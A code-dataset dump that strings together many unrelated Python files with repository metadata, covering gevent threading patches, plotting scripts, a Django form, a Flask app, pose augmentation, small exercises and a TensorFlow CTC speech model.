_tstate_lock = None
def __init__(self): # pylint:disable=super-init-not-called
#_DummyThread_.__init__(self)
# It'd be nice to use a pattern like "greenlet-%d", but maybe somebody out
# there is checking thread names...
self._name = self._Thread__name = __threading__._newname("DummyThread-%d")
# All dummy threads in the same native thread share the same ident
# (that of the native thread)
self._set_ident()
g = getcurrent()
gid = _get_ident(g)
__threading__._active[gid] = self
rawlink = getattr(g, 'rawlink', None)
if rawlink is not None:
# raw greenlet.greenlet greenlets don't
# have rawlink...
rawlink(_cleanup)
else:
# ... so for them we use weakrefs.
# See https://github.com/gevent/gevent/issues/918
global _weakref
if _weakref is None:
_weakref = __import__('weakref')
ref = _weakref.ref(g, _make_cleanup_id(gid))
self.__raw_ref = ref
def _Thread__stop(self):
pass
_stop = _Thread__stop # py3
def _wait_for_tstate_lock(self, *args, **kwargs):
# pylint:disable=arguments-differ
pass
if hasattr(__threading__, 'main_thread'): # py 3.4+
def main_native_thread():
return __threading__.main_thread() # pylint:disable=no-member
else:
def main_native_thread():
main_threads = [v for v in __threading__._active.values()
if isinstance(v, __threading__._MainThread)]
assert len(main_threads) == 1, "Too many main threads"
return main_threads[0]
import sys
if sys.version_info[:2] >= (3, 4):
# XXX: Issue 18808 breaks us on Python 3.4.
# Thread objects now expect a callback from the interpreter itself
# (threadmodule.c:release_sentinel). Because this never happens
# when a greenlet exits, join() and friends will block forever.
# The solution below involves capturing the greenlet when it is
# started and deferring the known broken methods to it.
class Thread(__threading__.Thread):
_greenlet = None
def is_alive(self):
return bool(self._greenlet)
isAlive = is_alive
def _set_tstate_lock(self):
self._greenlet = getcurrent()
def run(self):
try:
super(Thread, self).run()
finally:
# avoid ref cycles, but keep in __dict__ so we can
# distinguish the started/never-started case
self._greenlet = None
self._stop() # mark as finished
def join(self, timeout=None):
if '_greenlet' not in self.__dict__:
raise RuntimeError("Cannot join an inactive thread")
if self._greenlet is None:
return
self._greenlet.join(timeout=timeout)
def _wait_for_tstate_lock(self, *args, **kwargs):
# pylint:disable=arguments-differ
raise NotImplementedError()
__implements__.append('Thread')
class Timer(Thread, __threading__.Timer): # pylint:disable=abstract-method,inherit-non-class
pass
__implements__.append('Timer')
# The main thread is patched up with more care
# in _gevent_will_monkey_patch
if sys.version_info[:2] >= (3, 3):
__implements__.remove('_get_ident')
__implements__.append('get_ident')
get_ident = _get_ident
__implements__.remove('_sleep')
# Python 3 changed the implementation of threading.RLock
# Previously it was a factory function around threading._RLock
# which in turn used _allocate_lock. Now, it wants to use
# threading._CRLock, which is imported from _thread.RLock and as such
# is implemented in C. So it bypasses our _allocate_lock function.
# Fortunately they left the Python fallback in place
assert hasattr(__threading__, '_CRLock'), "Unsupported Python version"
_CRLock = None
__implements__.append('_CRLock')
def _gevent_will_monkey_patch(native_module, items, warn): # pylint:disable=unused-argument
# Make sure the MainThread can be found by our current greenlet ID,
# otherwise we get a new DummyThread, which cannot be joined.
# Fixes tests in test_threading_2 under PyPy.
main_thread = main_native_thread()
if __threading__.current_thread() != main_thread:
warn("Monkey-patching outside the main native thread. Some APIs "
"will not be available. Expect a KeyError to be printed at shutdown.")
return
if _get_ident() not in __threading__._active:
main_id = main_thread.ident
del __threading__._active[main_id]
main_thread._ident = main_thread._Thread__ident = _get_ident()
__threading__._active[_get_ident()] = main_thread
| [
"[email protected]"
] | |
a8116934e376d20bbab74c6b1f04d617a5ffe9ec | 1484f2311bc250a2ffd3841ec225855ad1e49ede | /web/trpo_plot.py | e9e3a8343ec3e49b21f05983053c327efc1e0bab | [
"Apache-2.0"
] | permissive | seba-1511/dtrpo.tf | 68527e2e043d1afc5545a961a5542447d66c658e | af6c1376eff0c82e591374b785a3d460407d3663 | refs/heads/master | 2021-03-27T13:00:22.816806 | 2017-09-14T20:38:24 | 2017-09-14T20:38:24 | 68,479,754 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,337 | py | #!/usr/bin/env python
import numpy as np
from seb.plot import Plot3D, Plot, Container, Animation
def grad_descent(x, y, dfnx, dfny, alpha=0.2, length=50):
trace = [(x, y)]
for _ in range(length):
x = x - alpha * dfnx(x)
y = y - alpha * dfny(y)
trace.append((x, y))
return np.array(trace), (x, y)
if __name__ == '__main__':
point_considered = -36
x_init = -1.9
y_init = -1
x = np.linspace(-7, 7, 50)
# 3D example
fn = lambda x, y: -np.sin(x / 2.0) + y**2
dfnx = lambda x: -0.5 * np.cos(x/2.0)
dfny = lambda y: 2*y
fig3d = Plot3D()
fig3d.surface(x, np.cos(x + 0.5), fn)
# fig3d.projection(x, np.cos(x + 0.5), fn)
fig3d.set_camera(45, 66)
fig3d.set_axis('x axis', 'y axis', 'z axis')
trace, (x_final, y_final) = grad_descent(x_init, y_init, dfnx, dfny)
fig3d.scatter(x=[trace[point_considered, 0], ],
y=[trace[point_considered, 1], ],
z=fn,
s=350.0, label='Trust Region')
fig3d.plot(x=trace[:, 0], y=trace[:, 1], z=fn, label='Trajectory')
fig3d.save('trpo3d.png')
# 1D Example
fig1d = Plot()
trace = trace[:-15]
point_considered = point_considered + 15
z = 10 * np.array([fn(a[0], a[1]) for a in trace])
iterations = np.arange(len(trace))
fig1d.circle(x=iterations[point_considered], y=z[point_considered], radius=1.0)
fig1d.plot(x=iterations, y=z, label='True Loss')
fig1d.scatter(x=[iterations[point_considered], ], y=[z[point_considered], ], label='Current params', s=10.0)
fig1d.annotate('Trust Region', (18, 17), (15, 5), rad=0.3)
fig1d.set_axis('Parameters', 'Cost')
# Hypothetical curves
x_trunc = iterations[point_considered:]
z_trunc = z[point_considered:]
z2 = [z_trunc[0] + np.sin((a - z_trunc[0])) for a in z_trunc]
fig1d.plot(x=x_trunc, y=z2)
z2 = [z_trunc[0] + np.sin((a - z_trunc[0])) for a in z_trunc]
fig1d.plot(x=x_trunc, y=z2)
z3 = [z_trunc[0] + 2*(a - z_trunc[0]) for a in z_trunc]
fig1d.plot(x=x_trunc, y=z3)
fig1d.save('conv.png')
cont = Container(1, 2)
cont.set_plot(0, 0, fig3d)
cont.set_plot(0, 1, fig1d)
cont.save('full.png')
# anim = Animation()
# fig3d.canvas.axis('off')
# anim.rotate_3d(fig3d)
# anim.save('trpo3d.gif')
| [
"[email protected]"
] | |
9a750644c7c30d305fece0758054509b41313121 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nnnewtown.py | 084a3e8d2a8510dc0d941baaf04079e5df1a367d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 64 | py | ii = [('DaltJMA.py', 4), ('MereHHB3.py', 7), ('MereHHB2.py', 1)] | [
"[email protected]"
] | |
b91a9f014091d145beefd604b36e716ee1e6cd3b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_160/ch47_2019_09_30_21_19_06_189136.py | 30315c6f92701799d9635e7747e2e53b795f6ba8 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | mes = ["Janeiro", 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho', 'Agosto','Setembro', 'Outubro', 'Novembro', 'Dezembro']
a = int(input("Qual o numero do mês?"))
print (mes[a-1]) | [
"[email protected]"
] | |
eb5c9dbff404af9ff312c40ae66082dcc42196ee | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/1/bT2.py | 33365dc270356a82e93b241e13483a5298b32126 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'bT2':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
0ef7edf91fbab55c4122ffaac4c6826a2d8eb89f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02582/s810007923.py | dddac5bb9b0868ce8c3f5f6ede87c46bf622dad1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | n = input()
r = 0
Tr = 0
for i in n:
if i == "R":
r += 1
Tr = r
elif i == "S":
r = 0
print(Tr)
| [
"[email protected]"
] | |
0c4bfd10df3bbda83d7ce3efebdafd3fc2400fa6 | 4331b28f22a2efb12d462ae2a8270a9f666b0df1 | /.history/dvdstore/webapp/form_20190914173126.py | 5fb05c3529c11f9f5ddfc438f3c22c91bac43a33 | [] | no_license | ZiyaadLakay/csc312.group.project | ba772a905e0841b17478eae7e14e43d8b078a95d | 9cdd9068b5e24980c59a53595a5d513c2e738a5e | refs/heads/master | 2020-07-26T23:30:22.542450 | 2019-09-16T11:46:41 | 2019-09-16T11:46:41 | 200,703,160 | 0 | 0 | null | 2019-08-05T17:52:37 | 2019-08-05T17:52:37 | null | UTF-8 | Python | false | false | 897 | py | from django import forms
from .models import DVD, Customer
from django.contrib.auth.models import User, auth
class DocumentForm(forms.ModelForm):
class Meta:
model = DVD
fields = ('Title','year','genre','PriceDVD','InStock','Synopsis','BookingPickup' ,'NumOfTimesRented','ImageDVD')
widgets = {'summary': Textarea(attrs={'rows':80, 'cols':20}),}
class CustomerForm(forms.ModelForm):
class Meta:
model= Customer
#user = User.objects.create_user(username=username, password=password1, email=email, first_name=first_name, last_name=last_name)
fields = ('username','password','email','first_name','last_name','phone_number','address','identification')
class customerForm2:
class Meta:
model= Customer
fields = ('username','password','email','first_name','last_name','phone_number','address','identification','isStaff')
| [
"[email protected]"
] | |
7651a9f9d6c025bbdc709a5aa4c5b17f0f9d5060 | 6a41dd36ddd3e501b62ff253b40bf9bbbaa722c2 | /코딩예제/ex01.py | 607d15fdb242b5454c257ab598cfc8ef6f0762cb | [] | no_license | skysamer/first_python | 9ba79b194d838e0cdeab6f2e7a4207d71c73ed63 | 638622f51434eda65ef3300e3ce5db3a2a79db2a | refs/heads/master | 2023-02-03T08:21:23.370285 | 2020-12-27T13:39:20 | 2020-12-27T13:39:20 | 307,953,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | print("Hello coding python")
print("hello!"*3)
print("혼자 공부하다 모르면 동영상 강의를 참고하세요")
| [
"[email protected]"
] | |
e0af43df6c45466129cf468cb3fa6be008df41a7 | e32fbfdd7e4c8060faf97d0f046b5c957b4695f8 | /app/tests/test_diffing.py | 5de81ab73492233fb2f9d4ddf4101528f5e10996 | [
"CC-BY-3.0",
"MIT"
] | permissive | fidlej/myerrata | ffeb777cc1b8cd2151b7dc7e79f1e1dd0fabed06 | c5b5cc78303bb783eb59a6d6c628d2b27a6584ca | refs/heads/master | 2020-04-11T16:02:41.134009 | 2010-08-25T15:21:48 | 2010-08-25T15:21:48 | 32,650,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | # coding: utf-8
from nose.tools import eq_
from src import diffing
def test_mark_changes():
tests = [
(("buy big car", "buy small car"),
"buy <del>big</del><ins>small</ins> car"),
(("buy big car", "buy small red car"),
"buy <del>big</del><ins>small red</ins> car"),
(("buy big car", "buy small car and test it"),
"buy <del>big</del><ins>small</ins> car<del></del><ins> and test it</ins>"),
(("buy big expensive car", "buy small car"),
"buy <del>big expensive</del><ins>small</ins> car"),
(("come to visit me and buy me a new algorithm", "algorithm, come to visit me and buy milk"),
"<ins>algorithm, </ins>come to visit me and buy <del>me a new algorithm</del><ins>milk</ins>"),
(("buy milk", "buy me a new algorithm"),
"buy <del>milk</del><ins>me a new algorithm</ins>"),
(("say something to me", "do you have anything to say?"),
"<ins>do you have anything to </ins>say<del> something to me</del><ins>?</ins>"),
((u"change vaše property", u"change naše property"),
u"change <del>vaše</del><ins>naše</ins> property"),
]
for args, expected in tests:
eq_(diffing.mark_changes(*args), expected)
| [
"[email protected]"
] | |
950fcc02c58cf78ac95e31320c47621e7685ecc1 | 9f674f9ba21a345bb3d573e0c77c4343427e1aca | /CorePython/11-ExceptionHandling/03-TryElse.py | 03207550771d87ab85a0332b854bd9c3cbf7b618 | [] | no_license | ravi4all/PythonWE_11-12_30 | f9c91c5ed238476933c0b92e55492259da8e4311 | c4d7a4bd3939b82056ed47d5a04624ec7565125f | refs/heads/master | 2021-09-13T22:34:31.082037 | 2018-05-05T11:13:05 | 2018-05-05T11:13:05 | 105,269,134 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | try:
file = open("file_1.txt")
data = file.read()
print(data)
file.seek(0,1,2)
except BaseException as err:
print("Error...",err)
else:
print("Inside Else")
finally:
print("File closed...")
file.close()
| [
"[email protected]"
] | |
ef59afb84dff253a108d771345e0adaaaa95a998 | 37aae70d77b0d4a0f2b073e5e032810b54f96657 | /google-cloud-sdk/lib/googlecloudsdk/api_lib/tasks/__init__.py | bf325b45fc95c19b9adb58c3266cee30e157326d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | talentdeveloper/casino_bot | 454a493ee09482ebe5ff00f0e983d2b2d99f7d85 | 60d1781934dd018055bac1e2b7ded44216ff875c | refs/heads/master | 2022-12-20T10:24:30.767164 | 2019-06-14T11:31:52 | 2019-06-14T11:31:52 | 189,037,455 | 0 | 1 | null | 2022-12-09T04:15:46 | 2019-05-28T13:49:03 | Python | UTF-8 | Python | false | false | 1,258 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""API Library for gcloud cloudtasks."""
from googlecloudsdk.api_lib.util import apis
API_NAME = 'cloudtasks'
API_VERSION = 'v2beta2'
def GetClientInstance(no_http=False):
return apis.GetClientInstance(API_NAME, API_VERSION, no_http=no_http)
def GetMessagesModule(client=None):
client = client or GetClientInstance()
return client.MESSAGES_MODULE
class ApiAdapter(object):
def __init__(self, client=None, messages=None):
client = client or GetClientInstance()
self.messages = messages or GetMessagesModule(client)
self.queues_service = client.projects_locations_queues
self.tasks_service = client.projects_locations_queues_tasks
| [
"[email protected]"
] | |
b2d3b409484443dd593d6a9fee8c104fc0b84c0c | 60715c9ea4c66d861708531def532814eab781fd | /python-programming-workshop/test/pythondatastructures/convert/bytes_to_megabytes.py | db68a188b17cb868fd29c58bcf7d2c17c9924547 | [] | no_license | bala4rtraining/python_programming | 6ce64d035ef04486f5dc9572cb0975dd322fcb3e | 99a5e6cf38448f5a01b310d5f7fa95493139b631 | refs/heads/master | 2023-09-03T00:10:26.272124 | 2021-11-01T08:20:52 | 2021-11-01T08:20:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py |
#Python that converts bytes, megabytes
def bytestomegabytes(bytes):
return (bytes / 1024) / 1024
def kilobytestomegabytes(kilobytes):
return kilobytes / 1024
# Convert 100000 bytes to megabytes.
megabytes1 = bytestomegabytes(100000)
print(100000, "bytes =", megabytes1, "megabytes")
# 1024 kilobytes to megabytes.
megabytes2 = kilobytestomegabytes(1024)
print(1024, "kilobytes =", megabytes2, "megabytes")
| [
"[email protected]"
] | |
0f08202392d68a8a2f30a4e9fa2f592bba1057cc | ff92e5cc5a96277188eb34df60d7119947b6349e | /core/gdrn_selfocc_modeling/tools/pose_aug.py | c3b8c8a23ab102882083298db0b79d116295247d | [
"Apache-2.0"
] | permissive | Pamyuu/SO-Pose | 000783e66e52e37f8fcfc246964695c6cdc3e13d | a3a61d2c97b1084a4754d6c12e45e16d85809729 | refs/heads/main | 2023-08-16T14:33:48.022277 | 2021-10-11T08:22:46 | 2021-10-11T08:22:46 | 441,398,467 | 1 | 0 | Apache-2.0 | 2021-12-24T07:29:21 | 2021-12-24T07:29:20 | null | UTF-8 | Python | false | false | 2,456 | py | import torch
import numpy as np
import math
from transforms3d.euler import euler2mat
from core.utils.pose_utils import euler2mat_torch
def aug_poses_normal(poses, std_rot=15, std_trans=[0.01, 0.01, 0.05], max_rot=45):
"""
Args:
poses (Tensor): [n,3,4]
std_rot: deg, randomly chosen from cfg.INPUT.NOISE_ROT_STD_{TRAIN|TEST}, eg. (15, 10, 5, 2.5)
std_trans: [dx, dy, dz], cfg.INPUT.NOISE_TRANS_STD_{TRAIN|TEST}
max_rot: deg, cfg.INPUT.NOISE_ROT_MAX_{TRAIN|TEST}
Returns:
poses_aug: [n,3,4]
"""
assert poses.ndim == 3, poses.shape
poses_aug = poses.clone()
bs = poses.shape[0]
device = poses.device
if isinstance(std_rot, (tuple, list)):
std_rot = np.random.choice(std_rot)
euler_noises_deg = torch.normal(mean=0, std=std_rot, size=(bs, 3)).to(device=device)
if max_rot is not None:
euler_noises_deg = euler_noises_deg.clamp(min=-max_rot, max=max_rot)
rot_noises = euler2mat_torch(euler_noises_deg * math.pi / 180.0) # (b,3,3)
trans_noises = torch.normal(
mean=torch.zeros_like(poses[:, :3, 3]), std=torch.tensor(std_trans, device=device).view(1, 3)
)
poses_aug[:, :3, :3] = rot_noises @ poses[:, :3, :3]
poses_aug[:, :3, 3] += trans_noises
return poses_aug
def aug_poses_normal_np(poses, std_rot=15, std_trans=[0.01, 0.01, 0.05], max_rot=45):
"""
Args:
poses (ndarray): [n,3,4]
std_rot: deg, randomly chosen from cfg.INPUT.NOISE_ROT_STD_{TRAIN|TEST}
std_trans: [dx, dy, dz], cfg.INPUT.NOISE_TRANS_STD_{TRAIN|TEST}
max_rot: deg, cfg.INPUT.NOISE_ROT_MAX_{TRAIN|TEST}
Returns:
poses_aug (ndarray): [n,3,4]
"""
assert poses.ndim == 3, poses.shape
poses_aug = poses.copy()
bs = poses.shape[0]
if isinstance(std_rot, (tuple, list)):
std_rot = np.random.choice(std_rot)
euler_noises_deg = np.random.normal(loc=0, scale=std_rot, size=(bs, 3))
if max_rot is not None:
euler_noises_deg = np.clip(euler_noises_deg, -max_rot, max_rot)
euler_noises_rad = euler_noises_deg * math.pi / 180.0
rot_noises = np.array([euler2mat(*xyz) for xyz in euler_noises_rad])
trans_noises = np.concatenate(
[np.random.normal(loc=0, scale=std_trans_i, size=(bs, 1)) for std_trans_i in std_trans], axis=1
)
poses_aug[:, :3, :3] = rot_noises @ poses[:, :3, :3]
poses_aug[:, :3, 3] += trans_noises
return poses_aug
| [
"[email protected]"
] | |
dccffc2a24e794af9ca352655e7bf2a47a54601a | 5838669d86cc572348ae16b4d50023815b5b7dd8 | /utils/shuffle_train_val.py | 73a4cc8d729cb90cb62fdaafde9df9a65f7a5c71 | [] | no_license | GiantPandaCV/yolov3-point | 46dc303693138bdf2a47f2d1827be46b0cd5a958 | 11b13147556029620d920c501f2880237947f245 | refs/heads/master | 2022-04-11T11:49:09.952474 | 2022-03-14T02:11:04 | 2022-03-14T02:11:04 | 234,021,307 | 214 | 55 | null | 2020-07-13T13:30:02 | 2020-01-15T07:15:27 | Jupyter Notebook | UTF-8 | Python | false | false | 1,330 | py | import os
import shutil
import random
train_txt = "/home/dongpeijie/datasets/dimtargetSingle/2007_train.txt"
test_txt = "/home/dongpeijie/datasets/dimtargetSingle/2007_test.txt"
val_txt = "/home/dongpeijie/datasets/dimtargetSingle/test.txt"
train_out_txt = "/home/dongpeijie/datasets/dimtargetSingle/shuffle_train.txt"
test_out_txt = "/home/dongpeijie/datasets/dimtargetSingle/shuffle_test.txt"
f_train = open(train_txt, "r")
f_test = open(test_txt, "r")
f_val = open(val_txt, "r")
o_train = open(train_out_txt, "w")
o_test = open(test_out_txt, "w")
train_content = f_train.readlines()
test_content = f_test.readlines()
val_content = f_val.readlines()
all_content = [*train_content, *test_content, *val_content]
print(len(train_content), len(test_content), len(all_content))
len_all = len(all_content)
train_percent = 0.8
# train:test = 8:2
train_sample_num = int(len_all * train_percent)
test_sample_num = len_all - train_sample_num
print("Train Sample:%d\nTest Sample:%d\n" % (train_sample_num, test_sample_num))
# print(random.sample(all_content, 10))
sampled_train = random.sample(all_content, train_sample_num)
for i in all_content:
if i in sampled_train:
o_train.write(i)
else:
o_test.write(i)
print("done")
f_test.close()
f_train.close()
f_val.close()
o_test.close()
o_train.close() | [
"[email protected]"
] | |
41c7ffd1ee44140d2d6909cdf3db380238a9019b | c83b9951cc5f54f2381ccdae7cef2b4b283dc663 | /practice/models.py | eaf2d14b42d2a654eb4ee39e559eb5fe38c10249 | [] | no_license | Tedhoon/s3 | faed91af68fa0b4aca7cd30c0e006f59dc337863 | 8f04492864b0228cae6a5c9d5c51e4505bcee3f5 | refs/heads/master | 2020-12-05T18:49:51.871855 | 2020-01-07T01:18:16 | 2020-01-07T01:18:16 | 232,215,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | from django.db import models
class Image(models.Model):
img = models.ImageField(upload_to='usr') | [
"[email protected]"
] | |
01da5a0e86cd8ce29cbc5a202aa44f0231c8e8af | dc955cb940976e360853a03c8a18c173be21e406 | /web_flask/3-python_route.py | 080068cf4596ab06d921d340f2c4365846556cbe | [] | no_license | SantiagoHerreG/AirBnB_clone_v2 | 888c04617d1f1e6ca01d080a57ae1932596a3a9a | 2669d2455e657c1096d8f32c1d083fdb3d22665b | refs/heads/master | 2020-11-25T05:24:36.767546 | 2020-01-23T04:20:59 | 2020-01-23T04:20:59 | 228,519,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | #!/usr/bin/python3
"""Uses the Flask micro framework to make an app server listen at 0.0.0.0:5000
"""
from flask import Flask
app = Flask(__name__)
@app.route('/', strict_slashes=False)
def home():
"""Function for handling the route /
"""
return "Hello HBNB!"
@app.route('/hbnb', strict_slashes=False)
def hbnb():
"""Handles /hbnb route
"""
return "HBNB"
@app.route('/c/<text>', strict_slashes=False)
def show_text(text=None):
"""Handles a request to route /c/<text>
"""
for letter in text:
if letter == "_":
letter = " "
return "C {}".format(text)
@app.route('/python/', strict_slashes=False)
@app.route('/python/<text>', strict_slashes=False)
def show_python(text="is_cool"):
"""Handles a request to route /python/(<text>)
"""
return "Python {}".format(text.replace("_", " "))
if __name__ == '__main__':
app.run(host='0.0.0.0', port='5000')
| [
"[email protected]"
] | |
f14bf2284a5ac68035d5cc581bed6b3963daf922 | 3c7dcf8c7af1536af8d6ff3b7ec4389e9523823a | /ssl_sale_ext/__manifest__.py | 9d0dd99da365af6fa2c0a914e27283a768065fe9 | [] | no_license | tate11/module | cb70e8e45ecb9912a597ea9310c29baf9074fa90 | b5148fad3f3a23df749d3d3d7278c2ce22e067d8 | refs/heads/master | 2020-03-18T21:11:18.403431 | 2017-06-14T07:48:48 | 2017-06-14T07:48:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | # -*- coding: utf-8 -*-
{
'name': 'SAL: SuperSilicone Sale Extention',
'version': '1.0',
'author': 'Kornelius K Macario (Falinwa Indonesia)',
'description': '''
Module to extend reporting file in Quotations.
''',
'depends': [
'ssl_base_ext',
],
'data': [
'report/ssl_sale_ext_report.xml',
'report/wishlist_report.xml',
'views/sale_view.xml',
'views/partner_view.xml',
'views/crm_lead_view.xml',
'views/wishlist_number.xml',
],
'css': [],
'js': [],
'installable': True,
'active': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
94090cd146bdbb675c2a0236d33670dd56158a11 | 006341ca12525aa0979d6101600e78c4bd9532ab | /CMS/Zope-3.2.1/Dependencies/twisted-Zope-3.2.1/twisted/lore/__init__.py | 142e9e5fcdd90fda4df2e11b44a9594c01d4c49d | [
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"ZPL-2.1",
"Python-2.0",
"ICU",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause",
"ZPL-2.0"
] | permissive | germanfriday/code-examples-sandbox | d0f29e20a3eed1f8430d06441ac2d33bac5e4253 | 4c538584703754c956ca66392fdcecf0a0ca2314 | refs/heads/main | 2023-05-30T22:21:57.918503 | 2021-06-15T15:06:47 | 2021-06-15T15:06:47 | 377,200,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
'''
The Twisted Documentation Generation System
Maintainer: U{Andrew Bennetts<mailto:[email protected]>}
'''
# TODO
# Abstract
# Bibliography
# Index
# Allow non-web image formats (EPS, specifically)
# Allow pickle output and input to minimize parses
# Numbered headers
# Navigational aides
__version__ = 'SVN-Trunk'
| [
"[email protected]"
] | |
c99df2302f718da619b9117303bad092b189a97e | 170864b6ec66be48138f231fe8ac3381481b8c9d | /python/BOJ_15652.py | 20c6e031ade32221e23ea0305ac743f403e37932 | [] | no_license | hyesungoh/AA_Algorithm | 5da3d8312d035d324dfaa31eef73f01a238231f3 | d68f52eaa29cfc4656a8b5623359166779ded06e | refs/heads/master | 2023-06-09T14:49:01.402456 | 2021-06-28T10:10:09 | 2021-06-28T10:10:09 | 272,701,231 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | n, m = map(int, input().split())
l = list(range(1, n+1))
ans = []
def bt(depth, index):
if depth == m:
print(*ans)
return
for i in range(n):
if l[i] >= index:
ans.append(l[i])
bt(depth + 1, l[i])
ans.pop()
bt(0, 0)
| [
"[email protected]"
] | |
a63e804d240377f401fed52279ef157ad6bf2aa1 | 6bf036d64271bb062451626c334b6eabaf2bcef9 | /tensorflow_asr/models/ctc/ctc.py | d7dcf5dd5e414338abc25104ccc39efad21dc96b | [
"Apache-2.0"
] | permissive | lamyiowce/TensorFlowASR | 7ce9d96f70da182e7d058a492993b62d523354e5 | 130124ccaf23fabe3e7a6f138d9403a7c0946ef3 | refs/heads/main | 2023-06-25T03:09:28.182924 | 2021-06-10T13:42:45 | 2021-06-10T13:42:45 | 390,671,234 | 0 | 0 | Apache-2.0 | 2021-07-29T09:29:18 | 2021-07-29T09:29:18 | null | UTF-8 | Python | false | false | 7,347 | py | # Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict, Union
import numpy as np
import tensorflow as tf
from ..base_model import BaseModel
from ...featurizers.speech_featurizers import TFSpeechFeaturizer
from ...featurizers.text_featurizers import TextFeaturizer
from ...utils import math_util, shape_util, data_util
from ...losses.ctc_loss import CtcLoss
class CtcModel(BaseModel):
def __init__(self,
encoder: tf.keras.Model,
decoder: Union[tf.keras.Model, tf.keras.layers.Layer] = None,
vocabulary_size: int = None,
**kwargs):
super().__init__(**kwargs)
self.encoder = encoder
if decoder is None:
assert vocabulary_size is not None, "vocabulary_size must be set"
self.decoder = tf.keras.layers.Dense(units=vocabulary_size, name=f"{self.name}_logits")
else:
self.decoder = decoder
self.time_reduction_factor = 1
def make(self, input_shape, batch_size=None):
inputs = tf.keras.Input(input_shape, batch_size=batch_size, dtype=tf.float32)
inputs_length = tf.keras.Input(shape=[], batch_size=batch_size, dtype=tf.int32)
self(
data_util.create_inputs(
inputs=inputs,
inputs_length=inputs_length
),
training=False
)
def compile(self,
optimizer,
global_batch_size,
blank=0,
run_eagerly=None,
**kwargs):
loss = CtcLoss(blank=blank, global_batch_size=global_batch_size)
super().compile(loss=loss, optimizer=optimizer, run_eagerly=run_eagerly, **kwargs)
def add_featurizers(self,
speech_featurizer: TFSpeechFeaturizer,
text_featurizer: TextFeaturizer):
self.speech_featurizer = speech_featurizer
self.text_featurizer = text_featurizer
def call(self, inputs, training=False, **kwargs):
logits = self.encoder(inputs["inputs"], training=training, **kwargs)
logits = self.decoder(logits, training=training, **kwargs)
return data_util.create_logits(
logits=logits,
logits_length=math_util.get_reduced_length(inputs["inputs_length"], self.time_reduction_factor)
)
# -------------------------------- GREEDY -------------------------------------
@tf.function
def recognize(self, inputs: Dict[str, tf.Tensor]):
logits = self(inputs, training=False)
probs = tf.nn.softmax(logits["logits"])
def map_fn(prob): return tf.numpy_function(self._perform_greedy, inp=[prob], Tout=tf.string)
return tf.map_fn(map_fn, probs, fn_output_signature=tf.TensorSpec([], dtype=tf.string))
